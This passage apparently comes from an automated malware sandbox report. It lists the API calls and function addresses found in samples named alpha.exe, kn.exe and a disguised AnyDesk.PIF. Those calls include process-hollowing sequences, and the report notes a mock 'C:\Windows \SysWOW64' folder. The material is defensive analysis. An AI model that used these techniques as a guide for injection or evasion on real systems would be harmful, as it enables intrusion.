                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1541538 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memmove,memmove,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_00007FF7D1541538
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15289E4 NtQueryInformationToken,NtQueryInformationToken,8_2_00007FF7D15289E4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1528114 NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_00007FF7D1528114
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D153BCF0 fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_00007FF7D153BCF0
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15288C0 NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_00007FF7D15288C0
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1527FF8 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,NtSetInformationFile,DeleteFileW,GetLastError,8_2_00007FF7D1527FF8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F143C964 NtQuerySystemTime,RtlTimeToSecondsSince1970,9_2_00007FF7F143C964
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB8670 NtUnmapViewOfSection,15_2_02EB8670
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB8400 NtReadVirtualMemory,15_2_02EB8400
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB7A2C NtAllocateVirtualMemory,15_2_02EB7A2C
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBDC8C RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose,15_2_02EBDC8C
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBDC04 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02EBDC04
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB7D78 NtWriteVirtualMemory,15_2_02EB7D78
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB8D70 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02EB8D70
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBDD70 RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,15_2_02EBDD70
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB7A2A NtAllocateVirtualMemory,15_2_02EB7A2A
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EBDBB0 RtlI,RtlDosPathNameToNtPathName_U,NtDeleteFile,15_2_02EBDBB0
                    Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 15_2_02EB8D6E GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,15_2_02EB8D6E
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1515240: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPEAX@Z,memset,CreateFileW,DeviceIoControl,memmove,CloseHandle,??_V@YAXPEAX@Z,memset,FindClose,??_V@YAXPEAX@Z,??_V@YAXPEAX@Z,4_2_00007FF7D1515240
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1524224 InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,wcsrchr,lstrcmpW,SetConsoleMode,CreateProcessW,CloseHandle,CreateProcessAsUserW,_local_unwind,GetLastError,_local_unwind,_local_unwind,CloseHandle,DeleteProcThreadAttributeList,GetLastError,GetLastError,DeleteProcThreadAttributeList,4_2_00007FF7D1524224
                    Source: C:\Users\Public\alpha.pifFile created: C:\WindowsJump to behavior
                    Source: C:\Users\Public\alpha.pifFile created: C:\Windows \SysWOW64Jump to behavior
                    Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\6465d78f7f049fe9.bin
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1520A6C4_2_00007FF7D1520A6C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151AA544_2_00007FF7D151AA54
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15242244_2_00007FF7D1524224
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15255544_2_00007FF7D1525554
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15237D84_2_00007FF7D15237D8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151E6804_2_00007FF7D151E680
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153EE884_2_00007FF7D153EE88
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15152404_2_00007FF7D1515240
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151D2504_2_00007FF7D151D250
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1519E504_2_00007FF7D1519E50
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15176504_2_00007FF7D1517650
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15122204_2_00007FF7D1512220
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1514A304_2_00007FF7D1514A30
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153AA304_2_00007FF7D153AA30
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1537F004_2_00007FF7D1537F00
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1516EE44_2_00007FF7D1516EE4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15415384_2_00007FF7D1541538
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1517D304_2_00007FF7D1517D30
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1518DF84_2_00007FF7D1518DF8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151CE104_2_00007FF7D151CE10
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153D9D04_2_00007FF7D153D9D0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15181D44_2_00007FF7D15181D4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15118844_2_00007FF7D1511884
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1512C484_2_00007FF7D1512C48
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153AC4C4_2_00007FF7D153AC4C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15278544_2_00007FF7D1527854
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15185104_2_00007FF7D1518510
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151B0D84_2_00007FF7D151B0D8
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15218D44_2_00007FF7D15218D4
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1513F904_2_00007FF7D1513F90
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1515B704_2_00007FF7D1515B70
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1519B504_2_00007FF7D1519B50
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D151372C4_2_00007FF7D151372C
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D15134104_2_00007FF7D1513410
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D1516BE04_2_00007FF7D1516BE0
                    Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF7D153AFBC4_2_00007FF7D153AFBC
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1520A6C8_2_00007FF7D1520A6C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D151AA548_2_00007FF7D151AA54
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15242248_2_00007FF7D1524224
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15255548_2_00007FF7D1525554
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15237D88_2_00007FF7D15237D8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D151E6808_2_00007FF7D151E680
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D153EE888_2_00007FF7D153EE88
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15152408_2_00007FF7D1515240
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D151D2508_2_00007FF7D151D250
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1519E508_2_00007FF7D1519E50
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15176508_2_00007FF7D1517650
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15122208_2_00007FF7D1512220
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1514A308_2_00007FF7D1514A30
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D153AA308_2_00007FF7D153AA30
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1537F008_2_00007FF7D1537F00
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1516EE48_2_00007FF7D1516EE4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15415388_2_00007FF7D1541538
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1517D308_2_00007FF7D1517D30
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1518DF88_2_00007FF7D1518DF8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D151CE108_2_00007FF7D151CE10
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D153D9D08_2_00007FF7D153D9D0
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15181D48_2_00007FF7D15181D4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15118848_2_00007FF7D1511884
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1512C488_2_00007FF7D1512C48
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D153AC4C8_2_00007FF7D153AC4C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15278548_2_00007FF7D1527854
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15185108_2_00007FF7D1518510
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D151B0D88_2_00007FF7D151B0D8
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15218D48_2_00007FF7D15218D4
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1513F908_2_00007FF7D1513F90
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1515B708_2_00007FF7D1515B70
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1519B508_2_00007FF7D1519B50
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D151372C8_2_00007FF7D151372C
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D15134108_2_00007FF7D1513410
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D1516BE08_2_00007FF7D1516BE0
                    Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF7D153AFBC8_2_00007FF7D153AFBC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14538009_2_00007FF7F1453800
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142BC109_2_00007FF7F142BC10
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142C1209_2_00007FF7F142C120
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142CCB89_2_00007FF7F142CCB8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142F0209_2_00007FF7F142F020
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1352F389_2_00007FF7F1352F38
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F52909_2_00007FF7F13F5290
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B92D89_2_00007FF7F13B92D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141D2B49_2_00007FF7F141D2B4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139D2C09_2_00007FF7F139D2C0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A92C49_2_00007FF7F13A92C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134F2C09_2_00007FF7F134F2C0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CF1689_2_00007FF7F13CF168
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140511C9_2_00007FF7F140511C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13931E09_2_00007FF7F13931E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135D1B89_2_00007FF7F135D1B8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13911C89_2_00007FF7F13911C8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13ED4609_2_00007FF7F13ED460
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A74789_2_00007FF7F13A7478
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F94949_2_00007FF7F13F9494
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138F4349_2_00007FF7F138F434
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138D4409_2_00007FF7F138D440
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13454389_2_00007FF7F1345438
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14114F09_2_00007FF7F14114F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14394A89_2_00007FF7F14394A8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13654A09_2_00007FF7F13654A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136B36C9_2_00007FF7F136B36C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D53189_2_00007FF7F13D5318
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13773409_2_00007FF7F1377340
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13473F89_2_00007FF7F13473F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BD4109_2_00007FF7F13BD410
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142B3AC9_2_00007FF7F142B3AC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14333D09_2_00007FF7F14333D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14433D49_2_00007FF7F14433D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136D6609_2_00007FF7F136D660
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14156609_2_00007FF7F1415660
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F76789_2_00007FF7F13F7678
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14276789_2_00007FF7F1427678
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14236389_2_00007FF7F1423638
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13856489_2_00007FF7F1385648
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CF6D89_2_00007FF7F13CF6D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141D6DC9_2_00007FF7F141D6DC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FD6A09_2_00007FF7F13FD6A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13976B09_2_00007FF7F13976B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137156C9_2_00007FF7F137156C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137B58C9_2_00007FF7F137B58C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14195809_2_00007FF7F1419580
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BF5209_2_00007FF7F13BF520
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A55F09_2_00007FF7F13A55F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C95FC9_2_00007FF7F13C95FC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134F6109_2_00007FF7F134F610
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DD8589_2_00007FF7F13DD858
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14138749_2_00007FF7F1413874
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A78909_2_00007FF7F13A7890
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F38209_2_00007FF7F13F3820
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13618309_2_00007FF7F1361830
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D184C9_2_00007FF7F13D184C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13958CC9_2_00007FF7F13958CC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C37609_2_00007FF7F13C3760
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13997909_2_00007FF7F1399790
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135B7889_2_00007FF7F135B788
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AD7F09_2_00007FF7F13AD7F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135F8009_2_00007FF7F135F800
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13817D49_2_00007FF7F13817D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B77C89_2_00007FF7F13B77C8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1391A609_2_00007FF7F1391A60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F9A589_2_00007FF7F13F9A58
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1373A409_2_00007FF7F1373A40
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BBA489_2_00007FF7F13BBA48
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1357AB49_2_00007FF7F1357AB4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A7AC89_2_00007FF7F13A7AC8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CF9909_2_00007FF7F13CF990
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F143994C9_2_00007FF7F143994C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14379389_2_00007FF7F1437938
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1341A109_2_00007FF7F1341A10
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C19AC9_2_00007FF7F13C19AC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136F9B89_2_00007FF7F136F9B8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1393C609_2_00007FF7F1393C60
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144FC909_2_00007FF7F144FC90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C1C909_2_00007FF7F13C1C90
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137FC209_2_00007FF7F137FC20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139FC349_2_00007FF7F139FC34
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139BCE89_2_00007FF7F139BCE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1355D089_2_00007FF7F1355D08
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F135BCA49_2_00007FF7F135BCA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1409CC09_2_00007FF7F1409CC0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1379CD09_2_00007FF7F1379CD0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D7B749_2_00007FF7F13D7B74
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B1B849_2_00007FF7F13B1B84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134FB849_2_00007FF7F134FB84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140BB289_2_00007FF7F140BB28
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13EFB509_2_00007FF7F13EFB50
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13ADBF09_2_00007FF7F13ADBF0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F3C109_2_00007FF7F13F3C10
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1345BA49_2_00007FF7F1345BA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1369BC89_2_00007FF7F1369BC8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CBE709_2_00007FF7F13CBE70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D1E2C9_2_00007FF7F13D1E2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C9EE49_2_00007FF7F13C9EE4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D5F049_2_00007FF7F13D5F04
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139DEA49_2_00007FF7F139DEA4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CDEB09_2_00007FF7F13CDEB0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1391ED09_2_00007FF7F1391ED0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A1D709_2_00007FF7F13A1D70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F7D709_2_00007FF7F13F7D70
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1399D6C9_2_00007FF7F1399D6C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F144DD849_2_00007FF7F144DD84
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137DD209_2_00007FF7F137DD20
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1351DE89_2_00007FF7F1351DE8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1375DF79_2_00007FF7F1375DF7
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DBDA09_2_00007FF7F13DBDA0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13780809_2_00007FF7F1378080
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14120849_2_00007FF7F1412084
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A80189_2_00007FF7F13A8018
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AC0B89_2_00007FF7F13AC0B8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1341F809_2_00007FF7F1341F80
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F9FF89_2_00007FF7F13F9FF8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14242749_2_00007FF7F1424274
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136227C9_2_00007FF7F136227C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B62809_2_00007FF7F13B6280
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140821C9_2_00007FF7F140821C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139E29C9_2_00007FF7F139E29C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13481709_2_00007FF7F1348170
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13601409_2_00007FF7F1360140
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CA1E89_2_00007FF7F13CA1E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14541F89_2_00007FF7F14541F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139C1D09_2_00007FF7F139C1D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13984849_2_00007FF7F1398484
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14204909_2_00007FF7F1420490
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D84889_2_00007FF7F13D8488
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134A4249_2_00007FF7F134A424
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142E4309_2_00007FF7F142E430
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F145842F9_2_00007FF7F145842F
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BA4509_2_00007FF7F13BA450
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC4509_2_00007FF7F13BC450
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13544E09_2_00007FF7F13544E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14284D89_2_00007FF7F14284D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CE4F09_2_00007FF7F13CE4F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13864A89_2_00007FF7F13864A8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B24D49_2_00007FF7F13B24D4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D63749_2_00007FF7F13D6374
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142234C9_2_00007FF7F142234C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C84149_2_00007FF7F13C8414
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13644109_2_00007FF7F1364410
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F138E3A09_2_00007FF7F138E3A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A03989_2_00007FF7F13A0398
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13D43D09_2_00007FF7F13D43D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140C6309_2_00007FF7F140C630
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A86309_2_00007FF7F13A8630
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13BC6F89_2_00007FF7F13BC6F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AC6D09_2_00007FF7F13AC6D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A655C9_2_00007FF7F13A655C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13785709_2_00007FF7F1378570
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13925809_2_00007FF7F1392580
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DE57C9_2_00007FF7F13DE57C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F134C5209_2_00007FF7F134C520
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14145389_2_00007FF7F1414538
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14485EC9_2_00007FF7F14485EC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13505E09_2_00007FF7F13505E0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14385A89_2_00007FF7F14385A8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CE8449_2_00007FF7F13CE844
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14328549_2_00007FF7F1432854
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14208C89_2_00007FF7F14208C8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14248C49_2_00007FF7F14248C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14367509_2_00007FF7F1436750
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CC7F09_2_00007FF7F13CC7F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C27D09_2_00007FF7F13C27D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F07D09_2_00007FF7F13F07D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F142AA589_2_00007FF7F142AA58
